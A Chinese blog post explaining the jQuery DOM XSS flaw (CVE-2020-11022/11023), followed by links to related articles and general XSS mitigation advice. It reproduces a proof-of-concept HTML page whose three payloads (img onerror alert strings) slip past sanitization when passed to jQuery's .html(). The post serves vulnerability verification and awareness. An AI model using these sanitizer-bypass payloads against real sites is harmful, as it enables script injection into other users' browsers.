jQuery导致的XSS跨站漏洞

最新推荐文章于 2024-07-19 20:28:52 发布
最新推荐文章于 2024-07-19 20:28:52 发布
阅读量5.2k 收藏 4
点赞数 1
文章标签: xss 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/127899504
版权

漏洞详情:

在JQuery的诸多发行版本中,存在着DOM-based XSS(跨站脚本攻击的一种)漏洞,易被攻击者利用。漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞。

漏洞发现:

最简单方式,通过火狐浏览器的retire.js插件,访问目标网站发现。

或者通过扫描器,找到JQuery版本信息

漏洞验证:

漏洞发现者提供了JavaScript XSS Demo POC,使用POC验证漏洞情况

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <script src="http://xxxxxxxxxxxxxx/js/common/jquery-2.1.3.min.js"></script>
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>

<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(2)> 
</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert("1st")>">
</xmp>

<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert("1st")></style>
</xmp>

<div id="div"></div>
</body>
</html>

点击POC1下的Append via .html,xss弹窗

F12查看源代码发现div下<style>标签被闭合,执行<img>中onerror的弹窗

其他就不做演示,可自行查看。

 

 

LZ_KaiHuang
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jQuery最新xss漏洞浅析、复现、修复
qq_29365787的博客
06-08 1万+
jQuery最新xss漏洞浅析、复现、修复 1、xss漏洞的形成和危害 形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是 应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。 在以下情况下会发生跨站点脚本编制 (XSS) 脆弱性: [1] 不可信数据进入 Web 应用程序,通常来自 Web 请求。 [2] Web 应用程序动态生成了包含此不可信数据的 Web 页面。 [3] 页面生成期间,应用程序不会禁止数据包含可由 Web 浏览器执
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】
一纸荒芜的博客
10-31 1万+
jquery-xss漏洞复现
jQuery-XSS漏洞(CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
2401_85014040的博客
05-17 707
在大于或等于1.2且在3.5.0之前的jQuery版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。上面漏洞验证payload代码没有问题,有些可能由于编辑器问题,复制后有些许问题,这里我给出我本地使用的poc,大家下载修改js路径即可使用。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**
Web安全-JQuery框架XSS漏洞浅析
热门推荐
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
jQuery框架漏洞全总结及开发建议
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
JQueryXSS攻击中的表现
甘焕的博客
11-29 1万+
前端XSS攻击中,直接运用innerHTML属性赋值,脚本绝不会被解析,代码如下:var html = '<script>alert(100)</script>'; // 里面的脚本绝不会执行,不会弹出100信息 document.body.innerHTML = html;1. $.html被轻松注入如果改用JQuery来实现,则出现了令人惊讶的结果,JS代码被轻松注入,代码如下:var h
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 1999
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
然而,谷歌的安全工程师Eduardo Vela在jQuery Mobile中发现了一个安全隐患,可能导致跨站脚本(XSS)攻击。这种攻击允许恶意用户在受害者的浏览器中执行代码,从而可能窃取用户数据、操纵页面内容或执行其他恶意操作...
跨站脚本漏洞(XSS)示例
04-15
例如,"测试Web应用程序是否存在跨站脚本漏洞(XSS).doc"可能就是一个文档,里面详细介绍了如何进行XSS漏洞扫描和测试步骤。通常,这包括对输入字段进行各种注入尝试,检查是否能成功触发恶意脚本的执行。 防止XSS...
Jquery XSS.zip
08-24
标题中的“Jquery XSS.zip”表明这是一个关于jQuery跨站脚本(XSS漏洞相关的压缩包文件。在Web开发中,jQuery是一个广泛使用的JavaScript库,它简化了HTML文档遍历、事件处理、动画和Ajax交互。而XSS,全称Cross...
jQuery-1.12.4
03-03
jQuery的版本分为1.x系列和2.x、3.x系列,1.x系列兼容低版本的浏览器,2.x、3.x系列放弃支持低版本浏览器,目前使用最多的是1.x系列的。
Jquery_html.rar
11-11
标题 "Jquery_html.rar" 暗示了这个压缩包包含了一个关于 jQuery 和 HTML 的示例,用于探讨和验证 jQuery 库在特定安全场景下的行为,即反射型跨站脚本(XSS)攻击的防护。反射型 XSS 是一种常见的 web 应用程序安全...
jQuery版本升级踩坑大全
10-23
早期的jQuery版本可能存在安全漏洞,例如DOMXSS,因此升级至1.9.x及以上版本对于确保网站安全至关重要。在升级过程中,开发者可能遇到的问题主要分为两类:常见坑和少见坑。 **常见坑** 1. **jQuery.fn.live方法的...
安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析
IT全栈 华强工作室
09-07 3484
代码安全扫描阶段,前端资源审计发现jQuery版本过低导致生产系统存在类风险。该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄露、账户被劫持、会话被劫持等安全问题。科运中心给出的解决方案是升级jQuery版本至3.5.0或更高版本。
【Web渗透】jQuery是怎么形成XSS
全栈纸伞
06-28 6130
最近有人问我怎么检测jQueryXSS,之前因为有强大的扫描器,只管上报即可,没有认真的分析形成的原因。 这次真的给问倒了,于是自己搭了个环境来研究一下。 分了如下几个可能出现的问题来解决。 1、是否所有的jQuery都存在XSS漏洞? 首先答案是否认的,用如下的例子来解决这个问题。 之前被误导,在网上发现这个代码,说是用来检测jQueryXSS代码。 var value = l...
JQuery XSS漏洞(CVE-2020-11022/11023)
ZPFCD的博客
01-19 2774
漏洞源于WEB应用缺少对客户端数据的正确验证。 影响版本: 1.2.0 <= jquery < V 3.5.0 测试代码: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title> <script sr.
复现CVE-2020-11022/11023(jQuery XSS漏洞
记录并分享学习安全的知识点..
05-31 5877
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
JQuery跨站脚本漏洞
zeroc009的博客
02-28 2492
原理: jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞 影响范围: 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞 已测试成功版本: jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js jquery-1.5所有版本 jquery-1.4所有版本 jquery-1.3所有版本 jquery-1.2所有版本 测试
DVWA靶场超(详细教程)--跨站攻击(XSS+CSRF)
最新发布
weixin_60838266的博客
07-19 1070
webanquan”去掉了(替换为空),我们的输入从alert变成了alert()
xss跨站脚本漏洞修复
08-31
XSS跨站脚本漏洞修复是保护网站免受潜在攻击的重要措施。下面是一些常见的修复方法: 1. 输入验证:对于用户输入的数据,进行严格的验证和过滤。使用白名单机制,只允许特定的字符和标签,过滤掉所有潜在的恶意脚本。 2. 输出编码:在将用户输入的数据输出到页面时,进行适当的编码操作,以防止浏览器将其解析为脚本代码。常用的编码方法包括HTML转义、URL编码等。 3. 设置HTTP头:使用安全的标头策略,如X-XSS-Protection、Content-Security-Policy等,以告诉浏览器如何处理潜在的XSS攻击。 4. Cookie安全措施:在设置Cookie时,使用HttpOnly属性,禁止通过脚本访问Cookie信息,从而减少XSS攻击的影响。 5. 安全沙箱:对于用户提供的富文本数据,使用合适的沙箱环境进行处理,限制其执行脚本的能力,确保不会造成恶意代码的注入。 6. 定期更新:保持软件和库的更新,及时修复已知的XSS漏洞。同时关注安全社区的最新消息,及时了解新的修复策略和最佳实践。 7. 高级防护措施:考虑使用Web应用防火墙(WAF)等高级安全工具来检测和阻止潜在的XSS攻击,提供额外的安全保护。 综上所述,修复XSS跨站脚本漏洞需要综合使用输入验证、输出编码、设置HTTP头、Cookie安全措施等多种方法,以加强网站的安全性。同时,定期更新软件和库,并采取高级防护措施有助于最大程度地降低XSS攻击风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值